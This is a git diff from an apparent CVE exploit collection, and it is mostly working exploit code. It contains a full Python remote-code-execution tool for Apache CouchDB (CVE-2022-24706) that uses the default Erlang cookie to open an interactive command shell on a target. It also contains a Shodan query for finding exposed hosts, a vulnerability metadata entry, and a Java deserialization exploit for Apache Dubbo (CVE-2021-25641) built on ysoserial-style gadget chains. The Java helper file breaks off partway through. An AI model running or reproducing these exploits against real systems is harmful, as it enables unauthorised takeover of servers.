@@ -1,136 +1,136 @@ -# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE) -# Date: 2022-01-21 -# Exploit Author: Konstantin Burov, @_sadshade -# Software Link: https://couchdb.apache.org/ -# Version: 3.2.1 and below -# Tested on: Kali 2021.2 -# Based on 1F98D's Erlang Cookie - Remote Code Execution -# Shodan: port:4369 "name couchdb at" -# CVE: CVE-2022-24706 -# References: -# https://habr.com/ru/post/661195/ -# https://www.exploit-db.com/exploits/49418 -# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ -# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce -# -# -#!/usr/local/bin/python3 - -import socket -from hashlib import md5 -import struct -import sys -import re -import time - -TARGET = "" -EPMD_PORT = 4369 # Default Erlang distributed port -COOKIE = "monster" # Default Erlang cookie for CouchDB -ERLNAG_PORT = 0 -EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list - -# Some data: -NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA" -CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04" -CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03" -CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex" - - -def compile_cmd(CMD): - MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00" - MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k" - MSG += struct.pack(">H", len(CMD)) - MSG += bytes(CMD, 'ascii') - MSG += b'jw\x04user' - PAYLOAD = b'\x70' + CTRL_DATA + MSG - PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD - return PAYLOAD - -print("Remote Command Execution via Erlang Distribution Protocol.\n") - -while not TARGET: - TARGET = input("Enter target host:\n> ") - -# Connect to EPMD: -try: - epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - epm_socket.connect((TARGET, EPMD_PORT)) -except socket.error as msg: - print("Couldnt connect to EPMD: %s\n terminating program" % msg) - sys.exit(1) - 
-epm_socket.send(EPM_NAME_CMD) #request Erlang nodes -if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK - data = epm_socket.recv(1024) - data = data[0:len(data) - 1].decode('ascii') - data = data.split("\n") - if len(data) == 1: - choise = 1 - print("Found " + data[0]) - else: - print("\nMore than one node found, choose which one to use:") - line_number = 0 - for line in data: - line_number += 1 - print(" %d) %s" %(line_number, line)) - choise = int(input("\n> ")) - - ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0]) -else: - print("Node list request error, exiting") - sys.exit(1) -epm_socket.close() - -# Connect to Erlang port: -try: - s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - s.connect((TARGET, ERLNAG_PORT)) -except socket.error as msg: - print("Couldnt connect to Erlang server: %s\n terminating program" % msg) - sys.exit(1) - -s.send(NAME_MSG) -s.recv(5) # Receive "ok" message -challenge = s.recv(1024) # Receive "challenge" message -challenge = struct.unpack(">I", challenge[9:13])[0] - -#print("Extracted challenge: {}".format(challenge)) - -# Add Challenge Digest -CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii") - + bytes(str(challenge), "ascii")).digest() -s.send(CHALLENGE_REPLY) -CHALLENGE_RESPONSE = s.recv(1024) - -if len(CHALLENGE_RESPONSE) == 0: - print("Authentication failed, exiting") - sys.exit(1) - -print("Authentication successful") -print("Enter command:\n") - -data_size = 0 -while True: - if data_size <= 0: - CMD = input("> ") - if not CMD: - continue - elif CMD == "exit": - sys.exit(0) - s.send(compile_cmd(CMD)) - data_size = struct.unpack(">I", s.recv(4))[0] # Get data size - s.recv(45) # Control message - data_size -= 45 # Data size without control message - time.sleep(0.1) - elif data_size < 1024: - data = s.recv(data_size) - #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data))) - time.sleep(0.1) - print(data.decode()) - data_size = 0 - else: - data = s.recv(1024) - #print("L---data_size: %d, data_recv_size: 
%d" %(data_size,len(data))) - time.sleep(0.1) - print(data.decode(),end = '') +# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE) +# Date: 2022-01-21 +# Exploit Author: Konstantin Burov, @_sadshade +# Software Link: https://couchdb.apache.org/ +# Version: 3.2.1 and below +# Tested on: Kali 2021.2 +# Based on 1F98D's Erlang Cookie - Remote Code Execution +# Shodan: port:4369 "name couchdb at" +# CVE: CVE-2022-24706 +# References: +# https://habr.com/ru/post/661195/ +# https://www.exploit-db.com/exploits/49418 +# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ +# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce +# +# +#!/usr/local/bin/python3 + +import socket +from hashlib import md5 +import struct +import sys +import re +import time + +TARGET = "" +EPMD_PORT = 4369 # Default Erlang distributed port +COOKIE = "monster" # Default Erlang cookie for CouchDB +ERLNAG_PORT = 0 +EPM_NAME_CMD = b"\x00\x01\x6e" # Request for nodes list + +# Some data: +NAME_MSG = b"\x00\x15n\x00\x07\x00\x03\x49\x9cAAAAAA@AAAAAAA" +CHALLENGE_REPLY = b"\x00\x15r\x01\x02\x03\x04" +CTRL_DATA = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03" +CTRL_DATA += b"\x00\x00\x00\x00\x00w\x00w\x03rex" + + +def compile_cmd(CMD): + MSG = b"\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00" + MSG += b"\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k" + MSG += struct.pack(">H", len(CMD)) + MSG += bytes(CMD, 'ascii') + MSG += b'jw\x04user' + PAYLOAD = b'\x70' + CTRL_DATA + MSG + PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD + return PAYLOAD + +print("Remote Command Execution via Erlang Distribution Protocol.\n") + +while not TARGET: + TARGET = input("Enter target host:\n> ") + +# Connect to EPMD: +try: + epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + epm_socket.connect((TARGET, EPMD_PORT)) +except socket.error as msg: + print("Couldnt connect to EPMD: %s\n 
terminating program" % msg) + sys.exit(1) + +epm_socket.send(EPM_NAME_CMD) #request Erlang nodes +if epm_socket.recv(4) == b'\x00\x00\x11\x11': # OK + data = epm_socket.recv(1024) + data = data[0:len(data) - 1].decode('ascii') + data = data.split("\n") + if len(data) == 1: + choise = 1 + print("Found " + data[0]) + else: + print("\nMore than one node found, choose which one to use:") + line_number = 0 + for line in data: + line_number += 1 + print(" %d) %s" %(line_number, line)) + choise = int(input("\n> ")) + + ERLNAG_PORT = int(re.search("\d+$",data[choise - 1])[0]) +else: + print("Node list request error, exiting") + sys.exit(1) +epm_socket.close() + +# Connect to Erlang port: +try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.connect((TARGET, ERLNAG_PORT)) +except socket.error as msg: + print("Couldnt connect to Erlang server: %s\n terminating program" % msg) + sys.exit(1) + +s.send(NAME_MSG) +s.recv(5) # Receive "ok" message +challenge = s.recv(1024) # Receive "challenge" message +challenge = struct.unpack(">I", challenge[9:13])[0] + +#print("Extracted challenge: {}".format(challenge)) + +# Add Challenge Digest +CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii") + + bytes(str(challenge), "ascii")).digest() +s.send(CHALLENGE_REPLY) +CHALLENGE_RESPONSE = s.recv(1024) + +if len(CHALLENGE_RESPONSE) == 0: + print("Authentication failed, exiting") + sys.exit(1) + +print("Authentication successful") +print("Enter command:\n") + +data_size = 0 +while True: + if data_size <= 0: + CMD = input("> ") + if not CMD: + continue + elif CMD == "exit": + sys.exit(0) + s.send(compile_cmd(CMD)) + data_size = struct.unpack(">I", s.recv(4))[0] # Get data size + s.recv(45) # Control message + data_size -= 45 # Data size without control message + time.sleep(0.1) + elif data_size < 1024: + data = s.recv(data_size) + #print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data))) + time.sleep(0.1) + print(data.decode()) + data_size = 0 + else: + data = s.recv(1024) + 
#print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data))) + time.sleep(0.1) + print(data.decode(),end = '') data_size -= 1024 \ No newline at end of file diff --git a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md index b0018858..73708b8f 100644 --- a/cve/apache-CouchDB/2022/CVE-2022-24706/README.md +++ b/cve/apache-CouchDB/2022/CVE-2022-24706/README.md @@ -1,26 +1,26 @@ -# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706 -Date: 2022-01-21 - -Exploit Author: Konstantin Burov, @_sadshade - -Software Link: https://couchdb.apache.org/ - -Version: 3.2.1 and below - -Tested on: Kali 2021.2 - -Based on 1F98D's Erlang Cookie - Remote Code Execution - -Shodan: port:4369 "name couchdb at" - -CVE: CVE-2022-24706 - -References: - -https://habr.com/ru/post/661195/ - -https://www.exploit-db.com/exploits/49418 - -https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ - +# Apache CouchDB 3.2.1 - Remote Code Execution (RCE) CVE-2022-24706 +Date: 2022-01-21 + +Exploit Author: Konstantin Burov, @_sadshade + +Software Link: https://couchdb.apache.org/ + +Version: 3.2.1 and below + +Tested on: Kali 2021.2 + +Based on 1F98D's Erlang Cookie - Remote Code Execution + +Shodan: port:4369 "name couchdb at" + +CVE: CVE-2022-24706 + +References: + +https://habr.com/ru/post/661195/ + +https://www.exploit-db.com/exploits/49418 + +https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ + https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce \ No newline at end of file diff --git a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml index 50fd5093..948e103c 100644 --- a/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml +++ b/cve/apache-CouchDB/2022/yaml/CVE-2022-24706.yaml 
@@ -1,32 +1,32 @@
-id: CVE-2022-24706
-source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
-info:
- name: Apache CouchDB 是一个面向文档的数据库管理系统。
- severity: critical
- description:
- 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
- scope-of-influence:
- apache-CouchDB < 3.2.2
- reference:
- - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
- - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
- - http://www.openwall.com/lists/oss-security/2022/04/26/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/1
- - http://www.openwall.com/lists/oss-security/2022/05/09/2
- - http://www.openwall.com/lists/oss-security/2022/05/09/3
- - http://www.openwall.com/lists/oss-security/2022/05/09/4
- - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
- - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
- - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
- - https://www.openwall.com/lists/oss-security/2022/04/26/1
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2022-24706
- cwe-id: CWE-1188
- cnvd-id: None
- kve-id: None
- tags:
- - 不安全的默认资源初始化
- - 弱口令要求
+id: CVE-2022-24706
+source: https://github.com/sadshade/CVE-2022-24706-CouchDB-Exploit
+info:
+ name: Apache CouchDB 是一个面向文档的数据库管理系统。
+ severity: critical
+ description:
+ 当CouchDB 以集群模式安装时,会开启epmd服务,并且监听相应端口。由于在默认安装过程中Apache CouchDB 将 Erlang Cookie默认设置为 monster,若未经修改,则攻击者可利用该cookie连接epmd,在知道fqdn的情况下执行任意代码,控制服务器。
+ scope-of-influence:
+ apache-CouchDB < 3.2.2
+ reference:
+ - http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
+ - http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
+ - http://www.openwall.com/lists/oss-security/2022/04/26/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/1
+ - http://www.openwall.com/lists/oss-security/2022/05/09/2
+ - http://www.openwall.com/lists/oss-security/2022/05/09/3
+ - http://www.openwall.com/lists/oss-security/2022/05/09/4
+ - https://docs.couchdb.org/en/3.2.2/setup/cluster.html
+ - https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
+ - https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
+ - https://www.openwall.com/lists/oss-security/2022/04/26/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2022-24706
+ cwe-id: CWE-1188
+ cnvd-id: None
+ kve-id: None
+ tags:
+ - 不安全的默认资源初始化
+ - 弱口令要求
- 远程代码执行
\ No newline at end of file
diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
index 684c223a..ed82fde2 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
+++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/pom.xml
@@ -1,60 +1,60 @@ - - - 4.0.0 - - groupId - DubboProtocolExploit - 1.0-SNAPSHOT - - - - org.apache.maven.plugins - maven-compiler-plugin - 3.8.1 - - 8 - 8 - - - - - - - org.apache.dubbo - dubbo - 2.7.3 - - - org.apache.dubbo - dubbo-common - 2.7.3 - - - com.alibaba - dubbo - 2.6.9 - - - com.alibaba - dubbo-remoting-netty4 - 2.6.9 - - - io.netty - netty-all - 4.1.60.Final - - - org.springframework - spring-web - 5.1.9.RELEASE - - - com.nqzero - permit-reflect - 0.4 - - - + + + 4.0.0 + + groupId + DubboProtocolExploit + 1.0-SNAPSHOT + + + + org.apache.maven.plugins + maven-compiler-plugin + 3.8.1 + + 8 + 8 + + + + + + + org.apache.dubbo + dubbo + 2.7.3 + + + org.apache.dubbo + dubbo-common + 2.7.3 + + + com.alibaba + dubbo + 2.6.9 + + + com.alibaba + dubbo-remoting-netty4 + 2.6.9 + + + io.netty + netty-all + 4.1.60.Final + + + org.springframework + spring-web + 5.1.9.RELEASE + + + com.nqzero + permit-reflect + 0.4 + + + diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java index 0efbaf72..b165e7b8 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Main.java 
@@ -1,157 +1,157 @@ -package DubboProtocolExploit; - - -import com.alibaba.fastjson.JSONObject; -import org.apache.dubbo.common.io.Bytes; -import org.apache.dubbo.common.serialize.Serialization; -import org.apache.dubbo.common.serialize.fst.FstObjectOutput; -import org.apache.dubbo.common.serialize.fst.FstSerialization; -import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput; -import org.apache.dubbo.common.serialize.kryo.KryoSerialization; -import org.apache.dubbo.common.serialize.ObjectOutput; -import org.apache.dubbo.rpc.RpcInvocation; -import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput; -import org.apache.dubbo.serialize.hessian.Hessian2Serialization; -/*import com.alibaba.dubbo.common.io.Bytes; -import com.alibaba.dubbo.common.serialize.Serialization; -import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput; -import com.alibaba.dubbo.common.serialize.fst.FstSerialization; -import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput; -import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization; -import com.alibaba.dubbo.common.serialize.ObjectOutput;*/ - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.OutputStream; -import java.io.Serializable; -import java.lang.reflect.Method; -import java.net.Socket; - -/* This Dubbo protocol exploit affects versions <= 2.7.3, - and will print "whoops!" on the server's console via RCE. 
- - This issue is caused by deserialization of untrusted data, - triggered via a communication protocol that allows dynamically - switching to a vulnerable deserializer, and exploited with a - payload gadget chain based on FastJson - - On Windows servers - it will try to execute calc.exe - On Linux servers - it will touch /tmp/dubboexploited - */ - -public class Main { - // Customize URL for remote targets - public static String DUBBO_HOST_NAME = "localhost"; - public static int DUBBO_HOST_PORT = 20880; - - // OS-specific payloads - comment to switch OS variants - // exploit will print "whoops!" on server console either way - //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux - public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows - - //Exploit variant - comment to switch exploit variants - public static String EXPLOIT_VARIANT = "Kryo"; - //public static String EXPLOIT_VARIANT = "FST"; - - // Magic header from ExchangeCodec - protected static final short MAGIC = (short) 0xdabb; - protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0]; - protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1]; - - // Message flags from ExchangeCodec - protected static final byte FLAG_REQUEST = (byte) 0x80; - protected static final byte FLAG_TWOWAY = (byte) 0x40; - - public static void main(String[] args) throws Exception { - Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND); // TemplatesImpl gadget chain - - // triggers Runtime.exec() on TemplatesImpl.newTransformer() - JSONObject jo = new JSONObject(); - jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper - Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger - - // encode request data. 
- ByteArrayOutputStream bos = new ByteArrayOutputStream(); - - // Kryo exploit variant - Serialization s; - ObjectOutput objectOutput; - switch(EXPLOIT_VARIANT) { - case "FST": - s = new FstSerialization(); - objectOutput = new FstObjectOutput(bos); - break; - case "Kryo": - default: - s = new KryoSerialization(); - objectOutput = new KryoObjectOutput(bos); - break; - } - - // 0xc2 is Hessian2 + two-way + Request serialization - // Kryo | two-way | Request is 0xc8 on third byte - // FST | two-way | Request is 0xc9 on third byte - - byte requestFlags = (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY); - byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags, - 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs - bos.write(header); - // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too - /* - objectOutput.writeUTF("notAversion"); - objectOutput.writeUTF("notAservice"); - objectOutput.writeUTF("notAserviceVersion"); - objectOutput.writeUTF("notAmethod"); - objectOutput.writeUTF("notAtype"); //*/ - - // This section contains valid data writes - RpcInvocation ri = new RpcInvocation(); - ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class}); - //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;"); - ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}}); - // Strings need only satisfy "readUTF" calls until "readObject" is reached - - // /* - objectOutput.writeUTF("2.0.2"); - objectOutput.writeUTF("org.apache.dubbo.demo.DemoService"); - objectOutput.writeUTF("0.0.0"); - objectOutput.writeUTF("sayHello"); - objectOutput.writeUTF("Ljava/lang/String;"); //*/ - - objectOutput.writeObject(gadgetChain); - objectOutput.writeObject(ri.getAttachments()); - - objectOutput.flushBuffer(); - byte[] payload = bos.toByteArray(); - int len = payload.length - header.length; - 
Bytes.int2bytes(len, payload, 12); - - // Dubbo Message Stream Hex Dump - for (int i = 0; i < payload.length; i++) { - System.out.print(String.format("%02X", payload[i]) + " "); - if ((i + 1) % 8 == 0) - System.out.print(" "); - if ((i + 1) % 16 == 0 ) - System.out.println(); - - } - // Payload string - System.out.println(); - System.out.println(new String(payload)); - - Socket pingSocket = null; - OutputStream out = null; - // Send request over TCP socket - try { - pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT); - out = pingSocket.getOutputStream(); - } catch (IOException e) { - return; - } - out.write(payload); - out.flush(); - out.close(); - pingSocket.close(); - System.out.println("Sent!"); - } -} +package DubboProtocolExploit; + + +import com.alibaba.fastjson.JSONObject; +import org.apache.dubbo.common.io.Bytes; +import org.apache.dubbo.common.serialize.Serialization; +import org.apache.dubbo.common.serialize.fst.FstObjectOutput; +import org.apache.dubbo.common.serialize.fst.FstSerialization; +import org.apache.dubbo.common.serialize.kryo.KryoObjectOutput; +import org.apache.dubbo.common.serialize.kryo.KryoSerialization; +import org.apache.dubbo.common.serialize.ObjectOutput; +import org.apache.dubbo.rpc.RpcInvocation; +import org.apache.dubbo.serialize.hessian.Hessian2ObjectOutput; +import org.apache.dubbo.serialize.hessian.Hessian2Serialization; +/*import com.alibaba.dubbo.common.io.Bytes; +import com.alibaba.dubbo.common.serialize.Serialization; +import com.alibaba.dubbo.common.serialize.fst.FstObjectOutput; +import com.alibaba.dubbo.common.serialize.fst.FstSerialization; +import com.alibaba.dubbo.common.serialize.kryo.KryoObjectOutput; +import com.alibaba.dubbo.common.serialize.kryo.KryoSerialization; +import com.alibaba.dubbo.common.serialize.ObjectOutput;*/ + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.OutputStream; +import java.io.Serializable; +import java.lang.reflect.Method; +import java.net.Socket; 
+ +/* This Dubbo protocol exploit affects versions <= 2.7.3, + and will print "whoops!" on the server's console via RCE. + + This issue is caused by deserialization of untrusted data, + triggered via a communication protocol that allows dynamically + switching to a vulnerable deserializer, and exploited with a + payload gadget chain based on FastJson + + On Windows servers - it will try to execute calc.exe + On Linux servers - it will touch /tmp/dubboexploited + */ + +public class Main { + // Customize URL for remote targets + public static String DUBBO_HOST_NAME = "localhost"; + public static int DUBBO_HOST_PORT = 20880; + + // OS-specific payloads - comment to switch OS variants + // exploit will print "whoops!" on server console either way + //public static String DUBBO_RCE_COMMAND = "touch /tmp/dubboexploited"; // Linux + public static String DUBBO_RCE_COMMAND = "calc.exe"; // Windows + + //Exploit variant - comment to switch exploit variants + public static String EXPLOIT_VARIANT = "Kryo"; + //public static String EXPLOIT_VARIANT = "FST"; + + // Magic header from ExchangeCodec + protected static final short MAGIC = (short) 0xdabb; + protected static final byte MAGIC_HIGH = Bytes.short2bytes(MAGIC)[0]; + protected static final byte MAGIC_LOW = Bytes.short2bytes(MAGIC)[1]; + + // Message flags from ExchangeCodec + protected static final byte FLAG_REQUEST = (byte) 0x80; + protected static final byte FLAG_TWOWAY = (byte) 0x40; + + public static void main(String[] args) throws Exception { + Object templates = Utils.createTemplatesImpl(DUBBO_RCE_COMMAND); // TemplatesImpl gadget chain + + // triggers Runtime.exec() on TemplatesImpl.newTransformer() + JSONObject jo = new JSONObject(); + jo.put("oops",(Serializable)templates); // Vulnerable FastJSON wrapper + Object gadgetChain = Utils.makeXStringToStringTrigger(jo); // toString() trigger + + // encode request data. 
+ ByteArrayOutputStream bos = new ByteArrayOutputStream(); + + // Kryo exploit variant + Serialization s; + ObjectOutput objectOutput; + switch(EXPLOIT_VARIANT) { + case "FST": + s = new FstSerialization(); + objectOutput = new FstObjectOutput(bos); + break; + case "Kryo": + default: + s = new KryoSerialization(); + objectOutput = new KryoObjectOutput(bos); + break; + } + + // 0xc2 is Hessian2 + two-way + Request serialization + // Kryo | two-way | Request is 0xc8 on third byte + // FST | two-way | Request is 0xc9 on third byte + + byte requestFlags = (byte) (FLAG_REQUEST | s.getContentTypeId() | FLAG_TWOWAY); + byte[] header = new byte[]{MAGIC_HIGH, MAGIC_LOW, requestFlags, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; // Padding and 0 length LSBs + bos.write(header); + // Strings need only satisfy "readUTF" calls until "readObject" is reached, so garbage metadata works too + /* + objectOutput.writeUTF("notAversion"); + objectOutput.writeUTF("notAservice"); + objectOutput.writeUTF("notAserviceVersion"); + objectOutput.writeUTF("notAmethod"); + objectOutput.writeUTF("notAtype"); //*/ + + // This section contains valid data writes + RpcInvocation ri = new RpcInvocation(); + ri.setParameterTypes(new Class[] {Object.class, Method.class, Object.class}); + //ri.setParameterTypesDesc("Ljava/lang/String;[Ljava/lang/String;[Ljava/lang/Object;"); + ri.setArguments(new Object[] { "sayHello", new String[] {"org.apache.dubbo.demo.DemoService"}, new Object[] {"YOU"}}); + // Strings need only satisfy "readUTF" calls until "readObject" is reached + + // /* + objectOutput.writeUTF("2.0.2"); + objectOutput.writeUTF("org.apache.dubbo.demo.DemoService"); + objectOutput.writeUTF("0.0.0"); + objectOutput.writeUTF("sayHello"); + objectOutput.writeUTF("Ljava/lang/String;"); //*/ + + objectOutput.writeObject(gadgetChain); + objectOutput.writeObject(ri.getAttachments()); + + objectOutput.flushBuffer(); + byte[] payload = bos.toByteArray(); + int len = payload.length - header.length; + 
Bytes.int2bytes(len, payload, 12); + + // Dubbo Message Stream Hex Dump + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + + } + // Payload string + System.out.println(); + System.out.println(new String(payload)); + + Socket pingSocket = null; + OutputStream out = null; + // Send request over TCP socket + try { + pingSocket = new Socket(DUBBO_HOST_NAME, DUBBO_HOST_PORT); + out = pingSocket.getOutputStream(); + } catch (IOException e) { + return; + } + out.write(payload); + out.flush(); + out.close(); + pingSocket.close(); + System.out.println("Sent!"); + } +} diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java index 8aaf5e6c..e69a8a05 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/DubboProtocolExploit/Utils.java 
@@ -1,221 +1,221 @@ -package DubboProtocolExploit; - -import com.nqzero.permit.Permit; -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; -import com.sun.org.apache.xpath.internal.objects.XString; -import javassist.ClassClassPath; -import javassist.ClassPool; -import javassist.CtClass; -import org.springframework.aop.target.HotSwappableTargetSource; -import sun.reflect.ReflectionFactory; - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.InputStream; -import java.io.Serializable; -import java.lang.reflect.*; -import java.util.HashMap; -import java.util.Map; - -import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; - -/* - * Utility class - based on code found in ysoserial, includes method calls used in - * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were - * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. 
- * - * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger - * to create a toString trigger - * - * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial - * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec - */ -public class Utils { - static { - // special case for using TemplatesImpl gadgets with a SecurityManager enabled - System.setProperty(DESERIALIZE_TRANSLET, "true"); - - // for RMI remote loading - System.setProperty("java.rmi.server.useCodebaseOnly", "false"); - } - - public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; - - public static class StubTransletPayload extends AbstractTranslet implements Serializable { - - private static final long serialVersionUID = -5971610431559700674L; - - - public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} - - - @Override - public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} - } - - // required to make TemplatesImpl happy - public static class Foo implements Serializable { - - private static final long serialVersionUID = 8207363842866235160L; - } - - public static InvocationHandler createMemoizedInvocationHandler (final Map map ) throws Exception { - return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); - } - - public static Object createTemplatesImpl ( final String command ) throws Exception { - if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { - return createTemplatesImpl( - command, - Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), - Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), - Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); - } - - return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); - } - - 
